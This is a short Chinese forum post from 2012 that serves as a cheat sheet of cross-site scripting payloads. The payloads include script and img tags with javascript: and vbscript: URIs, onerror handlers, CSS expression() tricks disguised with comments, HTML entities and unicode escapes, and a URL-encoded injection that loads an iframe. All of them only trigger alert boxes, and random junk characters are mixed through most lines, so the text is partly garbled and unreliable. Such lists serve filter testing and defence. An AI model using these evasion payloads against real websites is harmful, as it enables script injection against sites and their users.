<script>alert("跨站")</script> (最常用)
/ ?+ E3 k( e$ F& {4 a<img scr=javascript:alert("跨站")></img>/ w* z7 _- o' A1 @
<img scr="javascript: alert(/跨站/)></img>; |: }3 V9 }$ l/ z9 k
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
# b5 S7 [, B' @8 M: k- P/ y<img scr="#" onerror=alert(/跨站/)></img>: C9 s3 i$ B$ C( j) d& H7 N
<img scr="#" style="xss:expression(alert(/xss/));"></img>
# S$ \7 k2 D. l* j9 ?<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)# i( V9 }! c8 t+ l. e% r& K
<img src=vbscript:msgbox ("xss")></img>' L, @ B6 h& Y6 m$ `1 a; S @
<style> input {left:expression (alert('xss'))}</style>- B# ?$ t5 O; J1 r( z; {
<div style={left:expression (alert('xss'))}></div>% D, Z" l( j" Z0 ~
<div style={left:exp/* */ression (alert('xss'))}></div>) u; [+ U+ c% B% c2 U
<div style={left:\0065\0078ression (alert('xss'))}></div>9 Q! W) o$ V% A0 j2 S& ?
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>9 p* [3 e+ m; ?6 _4 }; J% k
unicode <div style="{left:expRessioN (alert('xss'))}">
" [. P6 h) V! a. j- x4 S1 W7 a4 K4 ^( T% L) J+ D; N; Z( k
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["7 R) k1 i" }7 ~& g" T! }0 z
|
发表于 2012-9-15 14:09:13
收藏
支持
反对